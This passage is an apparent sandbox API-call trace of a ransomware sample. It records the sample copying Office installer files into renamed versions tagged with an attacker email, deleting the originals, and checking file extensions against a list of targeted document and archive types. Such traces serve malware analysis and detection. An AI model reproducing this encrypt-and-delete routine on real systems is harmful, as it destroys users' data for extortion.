	[0046.461] WriteFile (in: hFile=0x1a8, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0046.463] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xcce00, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0046.463] WriteFile (in: hFile=0x1a8, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0046.469] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x226a00, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0046.469] WriteFile (in: hFile=0x1a8, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0046.472] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb50b818 | out: hHeap=0x7d60000) returned 1
	[0046.472] CloseHandle (hObject=0x1a8) returned 1
	[0046.472] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0046.472] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89
	[0046.472] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89
	[0046.472] lstrlenW (lpString=".doc") returned 4
	[0046.472] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0046.472] lstrlenW (lpString=".docx") returned 5
	[0046.473] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1
	[0046.473] lstrlenW (lpString=".pdf") returned 4
	[0046.473] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0046.473] lstrlenW (lpString=".xls") returned 4
	[0046.473] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0046.473] lstrlenW (lpString=".xlsx") returned 5
	[0046.473] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1
	[0046.473] lstrlenW (lpString=".ppt") returned 4
	[0046.473] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0046.473] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89
	[0046.473] lstrlenW (lpString=".zip") returned 4
	[0046.473] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0046.473] lstrlenW (lpString=".rar") returned 4
	[0046.473] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0046.473] lstrlenW (lpString=".bz2") returned 4
	[0046.473] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0046.473] lstrlenW (lpString=".7z") returned 3
	[0046.473] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0046.473] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89
	[0046.473] lstrlenW (lpString=".dbf") returned 4
	[0046.473] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0046.473] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89
	[0046.473] lstrlenW (lpString=".1cd") returned 4
	[0046.473] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0046.473] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89
	[0046.473] lstrlenW (lpString=".jpg") returned 4
	[0046.473] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0046.473] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89
	[0046.473] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89
	[0046.473] lstrlenW (lpString=".doc") returned 4
	[0046.473] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0046.473] lstrlenW (lpString=".docx") returned 5
	[0046.473] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1
	[0046.474] lstrlenW (lpString=".pdf") returned 4
	[0046.474] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0046.474] lstrlenW (lpString=".xls") returned 4
	[0046.474] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0046.474] lstrlenW (lpString=".xlsx") returned 5
	[0046.474] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1
	[0046.474] lstrlenW (lpString=".ppt") returned 4
	[0046.474] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0046.474] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89
	[0046.474] lstrlenW (lpString=".zip") returned 4
	[0046.474] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0046.474] lstrlenW (lpString=".rar") returned 4
	[0046.474] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0046.474] lstrlenW (lpString=".bz2") returned 4
	[0046.474] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0046.474] lstrlenW (lpString=".7z") returned 3
	[0046.474] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0046.474] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89
	[0046.474] lstrlenW (lpString=".dbf") returned 4
	[0046.474] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0046.474] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89
	[0046.474] lstrlenW (lpString=".1cd") returned 4
	[0046.474] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0046.474] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89
	[0046.474] lstrlenW (lpString=".jpg") returned 4
	[0046.474] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0046.474] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0046.474] lstrlenW (lpString="PidGenX.dll") returned 11
	[0046.474] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0046.475] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=1463568) returned 1
	[0046.475] CloseHandle (hObject=0x1a8) returned 1
	[0046.475] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 0x2020
	[0046.475] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0046.475] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0046.475] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.475] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.475] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0046.475] GetLastError () returned 0x0
	[0046.475] ReadFile (in: hFile=0x1a8, lpBuffer=0xae90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2dfed4, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesRead=0xa2dfed4*=0xffff0, lpOverlapped=0x0) returned 1
	[0046.501] WriteFile (in: hFile=0x1f8, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0xa2dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfc9c*=0xffff0, lpOverlapped=0x0) returned 1
	[0046.691] ReadFile (in: hFile=0x1a8, lpBuffer=0xae90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2dfed4, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesRead=0xa2dfed4*=0x65520, lpOverlapped=0x0) returned 1
	[0046.705] WriteFile (in: hFile=0x1f8, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0x65530, lpNumberOfBytesWritten=0xa2dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfc9c*=0x65530, lpOverlapped=0x0) returned 1
	[0047.600] ReadFile (in: hFile=0x1a8, lpBuffer=0xae90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2dfed4, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesRead=0xa2dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0047.601] WriteFile (in: hFile=0x1f8, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa2dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0047.601] SetEndOfFile (hFile=0x1f8) returned 1
	[0047.601] CloseHandle (hObject=0x1f8) returned 1
	[0047.601] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.601] SetEndOfFile (hFile=0x1a8) returned 1
	[0047.607] CloseHandle (hObject=0x1a8) returned 1
	[0047.608] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0047.608] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 1
	[0047.608] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0047.608] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0047.608] lstrlenW (lpString=".doc") returned 4
	[0047.608] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0047.608] lstrlenW (lpString=".docx") returned 5
	[0047.608] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1
	[0047.608] lstrlenW (lpString=".pdf") returned 4
	[0047.608] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0047.608] lstrlenW (lpString=".xls") returned 4
	[0047.608] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0047.608] lstrlenW (lpString=".xlsx") returned 5
	[0047.608] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1
	[0047.608] lstrlenW (lpString=".ppt") returned 4
	[0047.608] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0047.608] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0047.608] lstrlenW (lpString=".zip") returned 4
	[0047.608] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0047.608] lstrlenW (lpString=".rar") returned 4
	[0047.608] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0047.609] lstrlenW (lpString=".bz2") returned 4
	[0047.609] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0047.609] lstrlenW (lpString=".7z") returned 3
	[0047.609] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0047.609] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0047.609] lstrlenW (lpString=".dbf") returned 4
	[0047.609] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0047.609] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0047.609] lstrlenW (lpString=".1cd") returned 4
	[0047.609] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0047.609] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0047.609] lstrlenW (lpString=".jpg") returned 4
	[0047.609] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0047.609] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0047.609] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0047.609] lstrlenW (lpString=".doc") returned 4
	[0047.609] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0047.609] lstrlenW (lpString=".docx") returned 5
	[0047.609] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1
	[0047.609] lstrlenW (lpString=".pdf") returned 4
	[0047.609] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0047.609] lstrlenW (lpString=".xls") returned 4
	[0047.609] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0047.609] lstrlenW (lpString=".xlsx") returned 5
	[0047.609] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1
	[0047.609] lstrlenW (lpString=".ppt") returned 4
	[0047.609] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0047.609] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0047.609] lstrlenW (lpString=".zip") returned 4
	[0047.609] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0047.609] lstrlenW (lpString=".rar") returned 4
	[0047.609] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0047.609] lstrlenW (lpString=".bz2") returned 4
	[0047.610] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0047.610] lstrlenW (lpString=".7z") returned 3
	[0047.610] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0047.610] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0047.610] lstrlenW (lpString=".dbf") returned 4
	[0047.610] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0047.610] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0047.610] lstrlenW (lpString=".1cd") returned 4
	[0047.610] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0047.610] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0047.610] lstrlenW (lpString=".jpg") returned 4
	[0047.610] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0047.610] lstrcmpiW (lpString1=".exe", lpString2=".bot") returned 1
	[0047.610] lstrlenW (lpString="setup.exe") returned 9
	[0047.610] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0047.610] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=1377656) returned 1
	[0047.610] CloseHandle (hObject=0x1a8) returned 1
	[0047.610] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 0x2020
	[0047.611] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0047.611] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0047.611] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.611] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.611] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0047.611] GetLastError () returned 0x0
	[0047.611] ReadFile (in: hFile=0x1a8, lpBuffer=0xae90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2dfed4, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesRead=0xa2dfed4*=0xffff0, lpOverlapped=0x0) returned 1
	[0047.633] WriteFile (in: hFile=0x1f8, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0xa2dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfc9c*=0xffff0, lpOverlapped=0x0) returned 1
	[0047.876] ReadFile (in: hFile=0x1a8, lpBuffer=0xae90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2dfed4, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesRead=0xa2dfed4*=0x50588, lpOverlapped=0x0) returned 1
	[0047.888] WriteFile (in: hFile=0x1f8, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0x50590, lpNumberOfBytesWritten=0xa2dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfc9c*=0x50590, lpOverlapped=0x0) returned 1
	[0047.897] ReadFile (in: hFile=0x1a8, lpBuffer=0xae90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2dfed4, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesRead=0xa2dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0047.897] WriteFile (in: hFile=0x1f8, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa2dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0047.897] SetEndOfFile (hFile=0x1f8) returned 1
	[0047.897] CloseHandle (hObject=0x1f8) returned 1
	[0047.897] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.897] SetEndOfFile (hFile=0x1a8) returned 1
	[0047.900] CloseHandle (hObject=0x1a8) returned 1
	[0047.901] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0047.901] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 1
	[0047.901] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0047.901] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0047.901] lstrlenW (lpString=".doc") returned 4
	[0047.901] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1
	[0047.901] lstrlenW (lpString=".docx") returned 5
	[0047.901] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1
	[0047.901] lstrlenW (lpString=".pdf") returned 4
	[0047.901] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1
	[0047.901] lstrlenW (lpString=".xls") returned 4
	[0047.901] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1
	[0047.901] lstrlenW (lpString=".xlsx") returned 5
	[0047.901] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1
	[0047.901] lstrlenW (lpString=".ppt") returned 4
	[0047.901] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1
	[0047.901] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0047.901] lstrlenW (lpString=".zip") returned 4
	[0047.901] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1
	[0047.901] lstrlenW (lpString=".rar") returned 4
	[0047.901] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1
	[0047.901] lstrlenW (lpString=".bz2") returned 4
	[0047.902] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1
	[0047.902] lstrlenW (lpString=".7z") returned 3
	[0047.902] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1
	[0047.902] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0047.902] lstrlenW (lpString=".dbf") returned 4
	[0047.902] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1
	[0047.902] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0047.902] lstrlenW (lpString=".1cd") returned 4
	[0047.902] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1
	[0047.902] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0047.902] lstrlenW (lpString=".jpg") returned 4
	[0047.902] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1
	[0047.902] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0047.902] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0047.902] lstrlenW (lpString=".doc") returned 4
	[0047.902] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1
	[0047.902] lstrlenW (lpString=".docx") returned 5
	[0047.902] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1
	[0047.902] lstrlenW (lpString=".pdf") returned 4
	[0047.902] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1
	[0047.902] lstrlenW (lpString=".xls") returned 4
	[0047.902] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1
	[0047.902] lstrlenW (lpString=".xlsx") returned 5
	[0047.902] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1
	[0047.902] lstrlenW (lpString=".ppt") returned 4
	[0047.902] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1
	[0047.902] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0047.902] lstrlenW (lpString=".zip") returned 4
	[0047.902] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1
	[0047.902] lstrlenW (lpString=".rar") returned 4
	[0047.902] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1
	[0047.902] lstrlenW (lpString=".bz2") returned 4
	[0047.902] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1
	[0047.903] lstrlenW (lpString=".7z") returned 3
	[0047.903] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1
	[0047.903] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0047.903] lstrlenW (lpString=".dbf") returned 4
	[0047.903] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1
	[0047.903] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0047.903] lstrlenW (lpString=".1cd") returned 4
	[0047.903] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1
	[0047.903] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0047.903] lstrlenW (lpString=".jpg") returned 4
	[0047.903] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1
	[0047.903] lstrcmpiW (lpString1=".cab", lpString2=".bot") returned 1
	[0047.903] lstrlenW (lpString="OWOW32WW.cab") returned 12
	[0047.903] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0048.187] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=36233052) returned 1
	[0048.187] CloseHandle (hObject=0x1b0) returned 1
